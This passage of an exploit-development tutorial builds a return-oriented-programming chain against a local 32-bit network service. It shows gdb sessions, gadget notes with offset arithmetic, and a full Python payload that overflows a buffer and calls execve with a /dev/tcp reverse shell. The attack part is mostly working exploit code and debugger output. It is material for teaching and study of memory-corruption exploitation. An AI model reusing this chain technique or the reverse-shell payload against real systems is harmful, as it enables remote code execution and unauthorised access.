# connect to 127.0.0.1 port 9999
s.connect(("127.0.0.1", 9999))

# send our payload
s.send(payload)

# close the socket
s.close()

When we test this we want to break at 0x08083f21, but there are 3 times we are using this gadget so we should continue through the first 2 and then check the values:

(gdb) delete 2
(gdb) break *0x08083f21
Breakpoint 3 at 0x8083f21
(gdb) run
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /home/appuser/app-net 
0xbfffe7a4: 0x080a8576  0xaaaaaaaa  0x08057b7e  0xaaaaaa9e
0xbfffe7b4: 0x080748fc  0xeeeeeeee  0xeeeeeeee  0x080535be
0xbfffe7c4: 0xeeeeeeee  0xeeeeeeee
=> 0x8083f21 <_dl_get_tls_static_info+17>:  mov    DWORD PTR [edx],eax

Breakpoint 3, 0x08083f21 in _dl_get_tls_static_info ()
4: /x $edx = 0xbfffeb80
3: /x $ebx = 0xeeeeeeee
2: /x $eax = 0x0
1: /x $ebp = 0xeeeeeeee
(gdb) continue
Continuing.
0xbfffe7f4: 0x0807abcc  0x0804dca2  0xeeeeeeee  0x080a8576
0xbfffe804: 0xaaaaaaaa  0x08057b7e  0xaaaaaa62  0x080748fc
0xbfffe814: 0xeeeeeeee  0xeeeeeeee
=> 0x8083f21 <_dl_get_tls_static_info+17>:  mov    DWORD PTR [edx],eax

Breakpoint 3, 0x08083f21 in _dl_get_tls_static_info ()
4: /x $edx = 0xbfffeb74
3: /x $ebx = 0xeeeeeeee
2: /x $eax = 0x0
1: /x $ebp = 0xeeeeeeee
(gdb) continue
Continuing.
0xbfffe83c: 0x41414141  0x41414141  0x41414141  0x41414141
0xbfffe84c: 0x41414141  0x41414141  0x41414141  0x41414141
0xbfffe85c: 0x41414141  0x41414141
=> 0x8083f21 <_dl_get_tls_static_info+17>:  mov    DWORD PTR [edx],eax

Breakpoint 3, 0x08083f21 in _dl_get_tls_static_info ()
4: /x $edx = 0xbfffeb74
3: /x $ebx = 0xeeeeeeee
2: /x $eax = 0xbfffeb2c
1: /x $ebp = 0xeeeeeeee
(gdb) x/xw 0xbfffeb74
0xbfffeb74: 0x00000000
(gdb) stepi
0xbfffe83c: 0x41414141  0x41414141  0x41414141  0x41414141
0xbfffe84c: 0x41414141  0x41414141  0x41414141  0x41414141
0xbfffe85c: 0x41414141  0x41414141
=> 0x8083f23 <_dl_get_tls_static_info+19>:  ret    
0x08083f23 in _dl_get_tls_static_info ()
4: /x $edx = 0xbfffeb74
3: /x $ebx = 0xeeeeeeee
2: /x $eax = 0xbfffeb2c
1: /x $ebp = 0xeeeeeeee
(gdb) x/xw 0xbfffeb74
0xbfffeb74: 0xbfffeb2c
(gdb) x/s 0xbfffeb2c
0xbfffeb2c:  "////bin/bash\377\377\377\377\377\377-c\377\377\377\377/bin/bash -i >& /dev/tcp/127.0.0.1/8000 0>&1\377\377\377\377,\353\377\277\314\314\314\314\335\335\335", <incomplete sequence \335>

Clearly we can see that we have written the correct address to the pointer and it now points to the correct string.

The reason we have the rest of the stuff there is because the examine command (x) in gdb when printing a string (x/s) stops when the first null is reached and we haven't changed the null termination to the end of the string yet.

Calculating And Writing The Remaining Nulls

We should now go about writing the nulls to the relevant parts in our data, we still have 3 nulls to write, 1 to terminate each of the string arguments.

I will not walk through each of these because I will use the exact same method but it is important to test the exploit at regular intevals to ensure you aren't miscalculating any values because if you do that it will spoil the rest of the exploit.

If it isn't obvious by now, what I'm doing is using edx as a pointer to where I want to write, using eax and ebx to work out the distance from the current value of edx to the next value, then calculating the address of the next value and finally moving that value into edx and writing zero to it.

Here are my notes updated to the point where all of the nulls have been set:

0x0807715a : push esp ; mov eax, dword ptr [0x80ccbcc] ; pop ebp ; ret
0x080525d0 : xchg eax, ebp ; ret
0x080a820e : mov edx, eax ; pop esi ; mov eax, edx ; pop edi ; pop ebp ; ret
0xeeeeeeee
0xeeeeeeee
0xeeeeeeee
---------------------------- edx contains address of 0x080525d0
---------------------------- time to calculate the distance to the end of data
0x080a8576 : pop eax ; ret
0xaaaaaaaa : value to subtract
0x08057b7e : pop ebx ; ret
0xaaaaa66a : (0xaaaaaaaa - (1000 + 88)) = distance to end of data
0x080748fc : sub eax, ebx ; pop ebx ; pop ebp ; ret
0xeeeeeeee
0xeeeeeeee : junk values to pop
---------------------------- eax contains the distance to the end of data
0x080535be : push eax ; pop ebx ; pop esi ; pop ebp ; ret
0xeeeeeeee
0xeeeeeeee : junk values to pop
0x0807abcc : mov eax, edx ; ret
0x080732ab : add eax, ebx ; pop ebx ; pop ebp ; ret
0xeeeeeeee
0xeeeeeeee : junk values to pop
---------------------------------------------------- eax contains the address of end of data
0x080a820e : mov edx, eax ; pop esi ; mov eax, edx ; pop edi ; pop ebp ; ret
0xeeeeeeee
0xeeeeeeee
0xeeeeeeee : junk values to pop
0x08099c0f : xor eax, eax ; ret
0x08083f21 : mov dword ptr [edx], eax ; ret
---------------------------------------------------- write nulls to the end of our data
0x080a8576 : pop eax ; ret
0xaaaaaaaa : value to subtract
0x08057b7e : pop ebx ; ret
0xaaaaaa9e : (0xaaaaaaaa - 12) = distance from edx to ////bin/bash pointer
0x080748fc : sub eax, ebx ; pop ebx ; pop ebp ; ret
0xeeeeeeee
0xeeeeeeee : junk values to pop
---------------------------------------------------- now eax contains the distance to ////bin/bash pointer from edx
0x080535be : push eax ; pop ebx ; pop esi ; pop ebp ; ret
0xeeeeeeee
0xeeeeeeee : junk values to pop
0x0807abcc : mov eax, edx ; ret
0x080748fc : sub eax, ebx ; pop ebx ; pop ebp ; ret
0xeeeeeeee
0xeeeeeeee : junk values to pop
---------------------------------------------------- now eax contains address of ////bin/bash pointer
0x080a820e : mov edx, eax ; pop esi ; mov eax, edx ; pop edi ; pop ebp ; ret
0xeeeeeeee
0xeeeeeeee
0xeeeeeeee : junk values to pop
0x08099c0f : xor eax, eax ; ret
0x08083f21 : mov dword ptr [edx], eax ; ret
0x0807abcc : mov eax, edx ; ret
0x0804dca2 : mov ecx, eax ; mov eax, dword ptr [eax] ; test eax, eax ; jne 0x804
dca1 ; pop ebp ; ret
0xeeeeeeee : junk value to pop
---------------------------------------------------- ecx contains the address of ////bin/bash pointer
0x080a8576 : pop eax ; ret
0xaaaaaaaa : value to subtract
0x08057b7e : pop ebx ; ret
0xaaaaaa62 : (0xaaaaaaaa - 72) = distance from edx to ////bin/bash
0x080748fc : sub eax, ebx ; pop ebx ; pop ebp ; ret
0xeeeeeeee
0xeeeeeeee : junk values to pop
---------------------------------------------------- now eax contains the distance to ////bin/bash from ecx/edx
0x080535be : push eax ; pop ebx ; pop esi ; pop ebp ; ret
0xeeeeeeee
0xeeeeeeee : junk values to pop
0x0807abcc : mov eax, edx ; ret
0x080748fc : sub eax, ebx ; pop ebx ; pop ebp ; ret
0xeeeeeeee
0xeeeeeeee : junk values to pop
---------------------------------------------------- now eax contains address of ////bin/bash
0x08083f21 : mov dword ptr [edx], eax ; ret
---------------------------------------------------- ////bin/bash pointer now contains the correct address of ////bin/bash
0x080a8576 : pop eax ; ret
0xaaaaaaaa : value to subtract
0x08057b7e : pop ebx ; ret
0xaaaaaaa6 : (0xaaaaaaaa - 4) = distance from ////bin/bash pointer to nearest null termination
0x080748fc : sub eax, ebx ; pop ebx ; pop ebp ; ret
0xeeeeeeee
0xeeeeeeee : junk values to pop
---------------------------------------------------- now eax contains the distance to null termination of 3rd arg
0x080535be : push eax ; pop ebx ; pop esi ; pop ebp ; ret
0xeeeeeeee
0xeeeeeeee : junk values to pop
0x0807abcc : mov eax, edx ; ret
0x080748fc : sub eax, ebx ; pop ebx ; pop ebp ; ret
0xeeeeeeee
0xeeeeeeee : junk values to pop
---------------------------------------------------- now eax contains address of null termination of 3rd arg
0x080a820e : mov edx, eax ; pop esi ; mov eax, edx ; pop edi ; pop ebp ; ret
0xeeeeeeee
0xeeeeeeee
0xeeeeeeee : junk values to pop
0x08099c0f : xor eax, eax ; ret
0x08083f21 : mov dword ptr [edx], eax ; ret
---------------------------------------------------- 3rd arg nulls now contain 4 nulls
0x080a8576 : pop eax ; ret
0xaaaaaaaa : value to subtract
0x08057b7e : pop ebx ; ret
0xaaaaaa7a : (0xaaaaaaaa - 48) = distance from edx to next nulls
0x080748fc : sub eax, ebx ; pop ebx ; pop ebp ; ret
0xeeeeeeee
0xeeeeeeee : junk values to pop
---------------------------------------------------- now eax contains the distance from edx to -c nulls
0x080535be : push eax ; pop ebx ; pop esi ; pop ebp ; ret
0xeeeeeeee
0xeeeeeeee : junk values to pop
0x0807abcc : mov eax, edx ; ret
0x080748fc : sub eax, ebx ; pop ebx ; pop ebp ; ret
0xeeeeeeee
0xeeeeeeee : junk values to pop
---------------------------------------------------- now eax contains address of -c nulls
0x080a820e : mov edx, eax ; pop esi ; mov eax, edx ; pop edi ; pop ebp ; ret
0xeeeeeeee
0xeeeeeeee
0xeeeeeeee : junk values to pop
0x08099c0f : xor eax, eax ; ret
0x08083f21 : mov dword ptr [edx], eax ; ret
---------------------------------------------------- -c nulls now contain 4 nulls
0x080a8576 : pop eax ; ret
0xaaaaaaaa : value to subtract
0x08057b7e : pop ebx ; ret
0xaaaaaaa2 : (0xaaaaaaaa - 8) = distance from edx to next nulls
0x080748fc : sub eax, ebx ; pop ebx ; pop ebp ; ret
0xeeeeeeee
0xeeeeeeee : junk values to pop
---------------------------------------------------- now eax contains the distance to the last nulls from edx
0x080535be : push eax ; pop ebx ; pop esi ; pop ebp ; ret
0xeeeeeeee
0xeeeeeeee : junk values to pop
0x0807abcc : mov eax, edx ; ret
0x080748fc : sub eax, ebx ; pop ebx ; pop ebp ; ret
0xeeeeeeee
0xeeeeeeee : junk values to pop
---------------------------------------------------- now eax contains address of last nulls
0x080a820e : mov edx, eax ; pop esi ; mov eax, edx ; pop edi ; pop ebp ; ret
0xeeeeeeee
0xeeeeeeee
0xeeeeeeee : junk values to pop
0x0805638b : mov edi, edx ; ret
0x08099c0f : xor eax, eax ; ret
0x08083f21 : mov dword ptr [edx], eax ; ret
---------------------------------------------------- last nulls now contain 4 nulls

#################DATA##################

------------------------strings---------------------
0x2f2f2f2f : ////bin/bash
0x2f6e6962
0x68736162
0xffffffff
--------------------------------------------------
0x632dffff : -c
0xffffffff
--------------------------------------------------
0x6e69622f : /bin/bash -i >& /dev/tcp/127.0.0.1/8000 0>&1
0x7361622f
0x692d2068
0x20263e20
0x7665642f
0x7063742f
0x3732312f
0x302e302e
0x382f312e
0x20303030
0x31263e30
0xffffffff
-------------------------pointers-------------------
0xbbbbbbbb : pointer to ////bin/bash
0xcccccccc : pointer to -c
0xdddddddd : pointer to args
0xffffffff

At this point all of our strings should be correctly null terminated.

Let's test this, I won't post the exploit script to try and keep the size of this post down a little but all I've done is put the relevant values into the script in the order I've put them in my notes.

To make it easier to break at the end I've put a gadget that I haven't use elsewhere (at 0x808456c) so that I can just break at the end and inspect memory:

(gdb) delete 3
(gdb) break *0x0808456c
Breakpoint 4 at 0x808456c
(gdb) run
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /home/appuser/app-net 
0xbfffe930: 0x41414141  0x41414141  0x41414141  0x41414141
0xbfffe940: 0x41414141  0x41414141  0x41414141  0x41414141
0xbfffe950: 0x41414141  0x41414141
=> 0x808456c <_dl_get_origin+28>:   mov    ecx,esi

Breakpoint 4, 0x0808456c in _dl_get_origin ()
4: /x $edx = 0xbfffeb38
3: /x $ebx = 0xeeeeeeee
2: /x $eax = 0x0
1: /x $ebp = 0xeeeeeeee
(gdb) display/x $ecx
5: /x $ecx = 0xbfffeb74
(gdb) x/xw 0xbfffeb74
0xbfffeb74: 0xbfffeb2c
(gdb) x/s 0xbfffeb2c
0xbfffeb2c:  "////bin/bash"
(gdb) x/s 0xbfffeb2c + 18
0xbfffeb3e:  "-c"
(gdb) x/s 0xbfffeb2c + 18 + 6
0xbfffeb44:  "/bin/bash -i >& /dev/tcp/127.0.0.1/8000 0>&1"

So our 3 strings are now correctly null terminated.

I calculated the addresses from the value stored at the address that ecx points to (the address of the first pointer that we wrote earlier).

On line 18 I instruct gdb to display the value of ecx, I then use the examine command to display the string at the address contained there.

I then add 18 (the number of bytes until the -c string) and display that string and add another 6 (the number of bytes from that point to the next string) to display the last string.

Writing The Remaining Pointers

As with the code we just wrote I will not go through every step as the method I will use is the same.

I will be working out the address of the first pointer that I need to change (firstly being the pointer to the -c argument string) using eax and ebx and using edx as the point of reference.

I will then be putting that address into edx, working out the address of the string that that pointer should be pointing to using the same method (which stores the address in eax) and then writing the value that eax contains into the address pointed to by edx.

There are 2 pointers that we need to do this for, the pointer to -c and the pointer to the long string (the actual reverse shell).

If you've fully understood the post so far, this should be a reasonably trivial task.

Here is the section of my notes that do this:

0x080a8576 : pop eax ; ret
0xaaaaaaaa : value to subtract
0x08057b7e : pop ebx ; ret
0xaaaaaa6a : (0xaaaaaaaa - 64) = distance from edx to -c arg pointer
0x080748fc : sub eax, ebx ; pop ebx ; pop ebp ; ret
0xeeeeeeee
0xeeeeeeee : junk values to pop
---------------------------------------------------- now eax contains the distance to -c arg pointer from edx
0x080535be : push eax ; pop ebx ; pop esi ; pop ebp ; ret
0xeeeeeeee
0xeeeeeeee : junk values to pop
0x0807abcc : mov eax, edx ; ret
0x080732ab : add eax, ebx ; pop ebx ; pop ebp ; ret
0xeeeeeeee
0xeeeeeeee : junk values to pop
---------------------------------------------------- now eax contains address of -c arg pointer
0x080a820e : mov edx, eax ; pop esi ; mov eax, edx ; pop edi ; pop ebp ; ret
0xeeeeeeee
0xeeeeeeee
0xeeeeeeee : junk values to pop
---------------------------------------------------- now edx contains address of -c arg pointer
0x080a8576 : pop eax ; ret
0xaaaaaaaa : value to subtract
0x08057b7e : pop ebx ; ret
0xaaaaaa70 : (0xaaaaaaaa - 58) = distance from edx to -c arg string
0x080748fc : sub eax, ebx ; pop ebx ; pop ebp ; ret
0xeeeeeeee
0xeeeeeeee : junk values to pop
---------------------------------------------------- now eax contains the distance to -c arg string
0x080535be : push eax ; pop ebx ; pop esi ; pop ebp ; ret
0xeeeeeeee
0xeeeeeeee : junk values to pop
0x0807abcc : mov eax, edx ; ret
0x080748fc : sub eax, ebx ; pop ebx ; pop ebp ; ret
0xeeeeeeee
0xeeeeeeee : junk values to pop
---------------------------------------------------- now eax contains the address of -c arg string
0x08083f21 : mov dword ptr [edx], eax ; ret
---------------------------------------------------- now the -c arg pointer contains the address of -c string
0x080a8576 : pop eax ; ret
0xaaaaaaaa : value to subtract
0x08057b7e : pop ebx ; ret
0xaaaaaaa6 : (0xaaaaaaaa - 4) = distance from edx to third arg pointer
0x080748fc : sub eax, ebx ; pop ebx ; pop ebp ; ret
0xeeeeeeee
0xeeeeeeee : junk values to pop
---------------------------------------------------- now eax contains the distance to the third pointer
0x080535be : push eax ; pop ebx ; pop esi ; pop ebp ; ret
0xeeeeeeee
0xeeeeeeee : junk values to pop
0x0807abcc : mov eax, edx ; ret
0x080732ab : add eax, ebx ; pop ebx ; pop ebp ; ret
0xeeeeeeee
0xeeeeeeee : junk values to pop
---------------------------------------------------- eax contains the address of third pointer
0x080a820e : mov edx, eax ; pop esi ; mov eax, edx ; pop edi ; pop ebp ; ret
0xeeeeeeee
0xeeeeeeee
0xeeeeeeee : junk values to pop
---------------------------------------------------- edx contains the address of third pointer
0x080a8576 : pop eax ; ret
0xaaaaaaaa : value to subtract
0x08057b7e : pop ebx ; ret
0xaaaaaa72: (0xaaaaaaaa - 56) = distance from edx to third arg string
0x080748fc : sub eax, ebx ; pop ebx ; pop ebp ; ret
0xeeeeeeee
0xeeeeeeee : junk values to pop
---------------------------------------------------- now eax contains the distance to the third string
0x080535be : push eax ; pop ebx ; pop esi ; pop ebp ; ret
0xeeeeeeee
0xeeeeeeee : junk values to pop
0x0807abcc : mov eax, edx ; ret
0x080748fc : sub eax, ebx ; pop ebx ; pop ebp ; ret
0xeeeeeeee
0xeeeeeeee : junk values to pop
---------------------------------------------------- eax contains the address of third string
0x08083f21 : mov dword ptr [edx], eax ; ret
---------------------------------------------------- third pointer contains address of third string

Now all of the pointers should point to the correct strings.

It's time to test it again, I will be using the same breakpoint trick I used last time:

(gdb) run
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /home/appuser/app-net 
0xbfffea38: 0x41414141  0x41414141  0x41414141  0x41414141
0xbfffea48: 0x41414141  0x41414141  0x41414141  0x41414141
0xbfffea58: 0x41414141  0x41414141
=> 0x808456c <_dl_get_origin+28>:   mov    ecx,esi

Breakpoint 4, 0x0808456c in _dl_get_origin ()
5: /x $ecx = 0xbfffeb74
4: /x $edx = 0xbfffeb7c
3: /x $ebx = 0xeeeeeeee
2: /x $eax = 0xbfffeb44
1: /x $ebp = 0xeeeeeeee
(gdb) x/4xw 0xbfffeb74
0xbfffeb74: 0xbfffeb2c  0xbfffeb3e  0xbfffeb44  0x00000000
(gdb) x/s 0xbfffeb2c
0xbfffeb2c:  "////bin/bash"
(gdb) x/s 0xbfffeb3e
0xbfffeb3e:  "-c"
(gdb) x/s 0xbfffeb44
0xbfffeb44:  "/bin/bash -i >& /dev/tcp/127.0.0.1/8000 0>&1"

Great, so that worked perfectly.

Setting Up The Rest Of The Registers And Inserting The Last Of The Gadgets

We now have everything setup except for the values of the eax, ebx and edx registers.

edx just needs to point to 1 of the nulls that we wrote, ebx should contain the address of the ////bin/bash string and eax should contain the value 11.

We will deal with edx first because we have to use ebx and eax afterwards.

We will then calculate the address that needs to go into ebx.

Lastly we will get 11 into eax and finally run int 0x80.

Here are my full finished notes.

Finishing The Exploit And Testing It

Now that we've got the full size of the exploit we can calculate the size of our code and recalculate the distance from the address that we first receive to our data.

I done this using a python script with all of the gadgets in, you can find that script here.

This shows us that the distance is 908 bytes and not 1000 bytes.

To recalculate this we do the sum 0xaaaaaaaa - (908 + 88) = 0xaaaaa6c6, so this is the new value that we need to pop into ebx at the start of our application to calculate the first address.

Now we have finished writing the exploit:

#!/usr/bin/env python

import socket

payload = "A" * 532

payload += "\x5a\x71\x07\x08" # ebp = esp

payload += "\xd0\x25\x05\x08" # xchg eax, ebp

payload += "\x0e\x82\x0a\x08" # edx = eax
payload += "\xee\xee\xee\xee"
payload += "\xee\xee\xee\xee"
payload += "\xee\xee\xee\xee"

############### Work out the distance to the end of the payload

payload += "\x76\x85\x0a\x08" # pop eax
payload += "\xaa\xaa\xaa\xaa"

payload += "\x7e\x7b\x05\x08" # pop ebx
payload += "\xc6\xa6\xaa\xaa"

payload += "\xfc\x48\x07\x08" # eax -= ebx
payload += "\xee\xee\xee\xee"
payload += "\xee\xee\xee\xee"

payload += "\xbe\x35\x05\x08" # ebx = eax
payload += "\xee\xee\xee\xee"
payload += "\xee\xee\xee\xee"

payload += "\xcc\xab\x07\x08" # eax = edx

payload += "\xab\x32\x07\x08" # eax += ebx
payload += "\xee\xee\xee\xee"
payload += "\xee\xee\xee\xee"

payload += "\x0e\x82\x0a\x08" # edx = eax
payload += "\xee\xee\xee\xee"
payload += "\xee\xee\xee\xee"
payload += "\xee\xee\xee\xee"

############### Write 0 to the end of the data

payload += "\x0f\x9c\x09\x08" # eax = 0

payload += "\x21\x3f\x08\x08" # [edx] = eax = 0

############### Work out the distance to 0xbbbbbbbb

payload += "\x76\x85\x0a\x08" # pop eax
payload += "\xaa\xaa\xaa\xaa"

payload += "\x7e\x7b\x05\x08" # pop ebx
payload += "\x9e\xaa\xaa\xaa"

payload += "\xfc\x48\x07\x08" # eax -= ebx (= 12) distance to 0xbbbbbbbb
payload += "\xee\xee\xee\xee"
payload += "\xee\xee\xee\xee"

payload += "\xbe\x35\x05\x08" # ebx = eax
payload += "\xee\xee\xee\xee"
payload += "\xee\xee\xee\xee"

payload += "\xcc\xab\x07\x08" # eax = edx

payload += "\xfc\x48\x07\x08" # eax -= ebx (= address of 0xbbbbbbbb)
payload += "\xee\xee\xee\xee"
payload += "\xee\xee\xee\xee"

############### Move address value into ecx

payload += "\x0e\x82\x0a\x08" # edx = eax
payload += "\xee\xee\xee\xee"
payload += "\xee\xee\xee\xee"
payload += "\xee\xee\xee\xee"

payload += "\x0f\x9c\x09\x08" # eax = 0

payload += "\x21\x3f\x08\x08" # [edx] = eax = 0

payload += "\xcc\xab\x07\x08" # eax = edx

payload += "\xa2\xdc\x04\x08" # ecx = eax
payload += "\xee\xee\xee\xee"

############### Work out the distance to ////bin/bash string

payload += "\x76\x85\x0a\x08" # pop eax
payload += "\xaa\xaa\xaa\xaa"

payload += "\x7e\x7b\x05\x08" # pop ebx
payload += "\x62\xaa\xaa\xaa"

payload += "\xfc\x48\x07\x08" # eax -= ebx (= distance to string)
payload += "\xee\xee\xee\xee"
payload += "\xee\xee\xee\xee"

############### Work out the address of ////bin/bash string and write to pointer

payload += "\xbe\x35\x05\x08" # ebx = eax
payload += "\xee\xee\xee\xee"
payload += "\xee\xee\xee\xee"

payload += "\xcc\xab\x07\x08" # eax = edx

payload += "\xfc\x48\x07\x08" # eax -= ebx (= address of string)
payload += "\xee\xee\xee\xee"
payload += "\xee\xee\xee\xee"

payload += "\x21\x3f\x08\x08" # [edx] = eax

############### Work out the distance to null termination of last string

payload += "\x76\x85\x0a\x08" # pop eax
payload += "\xaa\xaa\xaa\xaa"

payload += "\x7e\x7b\x05\x08" # pop ebx
payload += "\xa6\xaa\xaa\xaa"

payload += "\xfc\x48\x07\x08" # eax -= ebx
payload += "\xee\xee\xee\xee" # (= distance to last string termination)
payload += "\xee\xee\xee\xee"

############### Work out the address of null termination of last string

payload += "\xbe\x35\x05\x08" # ebx = eax
payload += "\xee\xee\xee\xee"
payload += "\xee\xee\xee\xee"

payload += "\xcc\xab\x07\x08" # eax = edx

payload += "\xfc\x48\x07\x08" # eax -= ebx (= address of string)
payload += "\xee\xee\xee\xee"
payload += "\xee\xee\xee\xee"

############### Write nulls to that address

payload += "\x0e\x82\x0a\x08" # edx = eax
payload += "\xee\xee\xee\xee"
payload += "\xee\xee\xee\xee"
payload += "\xee\xee\xee\xee"

payload += "\x0f\x9c\x09\x08" # eax = 0

payload += "\x21\x3f\x08\x08" # [edx] = eax = 0

############### Work out the address to -c string termination from edx

payload += "\x76\x85\x0a\x08" # pop eax
payload += "\xaa\xaa\xaa\xaa"

payload += "\x7e\x7b\x05\x08" # pop ebx
payload += "\x7a\xaa\xaa\xaa"

payload += "\xfc\x48\x07\x08" # eax -= ebx (= 48) distance to -c termination
payload += "\xee\xee\xee\xee"
payload += "\xee\xee\xee\xee"

payload += "\xbe\x35\x05\x08" # ebx = eax
payload += "\xee\xee\xee\xee"
payload += "\xee\xee\xee\xee"

payload += "\xcc\xab\x07\x08" # eax = edx

payload += "\xfc\x48\x07\x08" # eax -= ebx (= address of -c termination)
payload += "\xee\xee\xee\xee"
payload += "\xee\xee\xee\xee"

############### Write nulls to -c termination

payload += "\x0e\x82\x0a\x08" # edx = eax
payload += "\xee\xee\xee\xee"
payload += "\xee\xee\xee\xee"
payload += "\xee\xee\xee\xee"

payload += "\x0f\x9c\x09\x08" # eax = 0

payload += "\x21\x3f\x08\x08" # [edx] = eax = 0

############### Calculate the address of the last null termination

payload += "\x76\x85\x0a\x08" # pop eax
payload += "\xaa\xaa\xaa\xaa"

payload += "\x7e\x7b\x05\x08" # pop ebx
payload += "\xa2\xaa\xaa\xaa"

payload += "\xfc\x48\x07\x08" # eax -= ebx (= 8) distance to last termination
payload += "\xee\xee\xee\xee" # from edx
payload += "\xee\xee\xee\xee"

payload += "\xbe\x35\x05\x08" # ebx = eax
payload += "\xee\xee\xee\xee"
payload += "\xee\xee\xee\xee"

payload += "\xcc\xab\x07\x08" # eax = edx

payload += "\xfc\x48\x07\x08" # eax -= ebx (= address of last termination)
payload += "\xee\xee\xee\xee"
payload += "\xee\xee\xee\xee"

############### Write nulls to last termination

payload += "\x0e\x82\x0a\x08" # edx = eax
payload += "\xee\xee\xee\xee"
payload += "\xee\xee\xee\xee"
payload += "\xee\xee\xee\xee"

payload += "\x0f\x9c\x09\x08" # eax = 0

payload += "\x21\x3f\x08\x08" # [edx] = eax = 0

############### Work out the address of the -c pointer and store in edx

payload += "\x76\x85\x0a\x08" # pop eax
payload += "\xaa\xaa\xaa\xaa"

payload += "\x7e\x7b\x05\x08" # pop ebx
payload += "\x6a\xaa\xaa\xaa"

payload += "\xfc\x48\x07\x08" # eax -= ebx (= 8) distance to -c pointer
payload += "\xee\xee\xee\xee" # from edx
payload += "\xee\xee\xee\xee"

payload += "\xbe\x35\x05\x08" # ebx = eax
payload += "\xee\xee\xee\xee"
payload += "\xee\xee\xee\xee"

payload += "\xcc\xab\x07\x08" # eax = edx

payload += "\xab\x32\x07\x08" # eax += ebx (= address of -c pointer)
payload += "\xee\xee\xee\xee"
payload += "\xee\xee\xee\xee"

payload += "\x0e\x82\x0a\x08" # edx = eax
payload += "\xee\xee\xee\xee"
payload += "\xee\xee\xee\xee"
payload += "\xee\xee\xee\xee"

############### Work out the address of the -c string and write it

payload += "\x76\x85\x0a\x08" # pop eax
payload += "\xaa\xaa\xaa\xaa"

payload += "\x7e\x7b\x05\x08" # pop ebx
payload += "\x70\xaa\xaa\xaa"

payload += "\xfc\x48\x07\x08" # eax -= ebx (= 58) distance to -c string
payload += "\xee\xee\xee\xee" # from edx
payload += "\xee\xee\xee\xee"

payload += "\xbe\x35\x05\x08" # ebx = eax
payload += "\xee\xee\xee\xee"
payload += "\xee\xee\xee\xee"

payload += "\xcc\xab\x07\x08" # eax = edx

payload += "\xfc\x48\x07\x08" # eax -= ebx (= address of -c string)
payload += "\xee\xee\xee\xee"
payload += "\xee\xee\xee\xee"

payload += "\x21\x3f\x08\x08" # [edx] = eax = 0

############### Work out the address of the last string pointer


payload += "\x76\x85\x0a\x08" # pop eax
payload += "\xaa\xaa\xaa\xaa"

payload += "\x7e\x7b\x05\x08" # pop ebx
payload += "\xa6\xaa\xaa\xaa"

payload += "\xfc\x48\x07\x08" # eax -= ebx (= 4) distance to last pointer
payload += "\xee\xee\xee\xee" # from edx
payload += "\xee\xee\xee\xee"

payload += "\xbe\x35\x05\x08" # ebx = eax
payload += "\xee\xee\xee\xee"
payload += "\xee\xee\xee\xee"

payload += "\xcc\xab\x07\x08" # eax = edx

payload += "\xab\x32\x07\x08" # eax += ebx (= address of last pointer)
payload += "\xee\xee\xee\xee"
payload += "\xee\xee\xee\xee"

payload += "\x0e\x82\x0a\x08" # edx = eax
payload += "\xee\xee\xee\xee"
payload += "\xee\xee\xee\xee"
payload += "\xee\xee\xee\xee"

############### Work out the address of the last string and write it

payload += "\x76\x85\x0a\x08" # pop eax
payload += "\xaa\xaa\xaa\xaa"

payload += "\x7e\x7b\x05\x08" # pop ebx
payload += "\x72\xaa\xaa\xaa"

payload += "\xfc\x48\x07\x08" # eax -= ebx (= 56) distance to last string
payload += "\xee\xee\xee\xee" # from edx
payload += "\xee\xee\xee\xee"

payload += "\xbe\x35\x05\x08" # ebx = eax
payload += "\xee\xee\xee\xee"
payload += "\xee\xee\xee\xee"

payload += "\xcc\xab\x07\x08" # eax = edx

payload += "\xfc\x48\x07\x08" # eax -= ebx (= address of last string)
payload += "\xee\xee\xee\xee"
payload += "\xee\xee\xee\xee"

payload += "\x21\x3f\x08\x08" # [edx] = eax

############### Work out the address of the nearest nulls to edx
############### and store in edx

payload += "\x76\x85\x0a\x08" # pop eax
payload += "\xaa\xaa\xaa\xaa"

payload += "\x7e\x7b\x05\x08" # pop ebx
payload += "\x9e\xaa\xaa\xaa"

payload += "\xfc\x48\x07\x08" # eax -= ebx (= 12) distance to nearest nulls
payload += "\xee\xee\xee\xee" # from edx
payload += "\xee\xee\xee\xee"

payload += "\xbe\x35\x05\x08" # ebx = eax
payload += "\xee\xee\xee\xee"
payload += "\xee\xee\xee\xee"

payload += "\xcc\xab\x07\x08" # eax = edx

payload += "\xfc\x48\x07\x08" # eax -= ebx (= address of nearest nulls)
payload += "\xee\xee\xee\xee"
payload += "\xee\xee\xee\xee"

payload += "\x0e\x82\x0a\x08" # edx = eax
payload += "\xee\xee\xee\xee"
payload += "\xee\xee\xee\xee"
payload += "\xee\xee\xee\xee"

############### Work out the address of the /bin/bash string
############### and store in ebx

payload += "\x76\x85\x0a\x08" # pop eax
payload += "\xaa\xaa\xaa\xaa"

payload += "\x7e\x7b\x05\x08" # pop ebx
payload += "\x66\xaa\xaa\xaa"

payload += "\xfc\x48\x07\x08" # eax -= ebx (= 68) distance to /bin/bash string
payload += "\xee\xee\xee\xee" # from edx
payload += "\xee\xee\xee\xee"

payload += "\xbe\x35\x05\x08" # ebx = eax
payload += "\xee\xee\xee\xee"
payload += "\xee\xee\xee\xee"

payload += "\xcc\xab\x07\x08" # eax = edx

payload += "\xfc\x48\x07\x08" # eax -= ebx (= address of /bin/bash string)
payload += "\xee\xee\xee\xee"
payload += "\xee\xee\xee\xee"

payload += "\xbe\x35\x05\x08" # ebx = eax
payload += "\xee\xee\xee\xee"
payload += "\xee\xee\xee\xee"

############### Calculate 11 into eax and initialize syscall

payload += "\x76\x85\x0a\x08" # pop eax
payload += "\xf4\xff\xff\x81" # (0x81ffffe9 + 11) 11 = execve syscall number

payload += "\xcc\xa1\x0a\x08" # eax -= 0x81ffffe9

payload += "\x0d\x8c\x04\x08" # int 0x80

##################### DATA #####################

payload += "////bin/bash"
payload += "\xff\xff\xff\xff"

payload += "\xff\xff" + "-c"
payload += "\xff\xff\xff\xff"

payload += "/bin/bash -i >& /dev/tcp/127.0.0.1/8000 0>&1"
payload += "\xff\xff\xff\xff"

payload += "\xbb\xbb\xbb\xbb" # pointer to ////bin/bash
payload += "\xcc\xcc\xcc\xcc" # pointer to -c
payload += "\xdd\xdd\xdd\xdd" # pointer to args
payload += "\xff\xff\xff\xff"

# create the tcp socket
